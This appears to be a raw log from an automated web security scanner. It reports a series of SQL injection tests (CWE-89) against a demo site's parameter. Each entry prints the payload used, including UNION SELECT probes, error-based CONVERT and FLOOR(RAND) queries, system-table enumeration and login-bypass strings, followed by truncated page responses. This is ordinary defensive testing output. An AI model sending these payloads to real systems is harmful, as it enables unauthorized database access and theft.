response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1723\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# /*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1724\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# //\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1725\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1726\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin') or ('1'='1'#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1727\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\" or 1=1/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1728\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' and 1 in (select min(name) from sysobjects where xtype = '\nU' and name > '.') --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1729\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1730\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(\n0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,\nFLOOR(RAND(0)*2))x FROM \nINFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1731\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1732\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR 1=0#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1733\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1734Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '^'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1735\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# WHERE 1=1 AND 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1736\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 14#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk 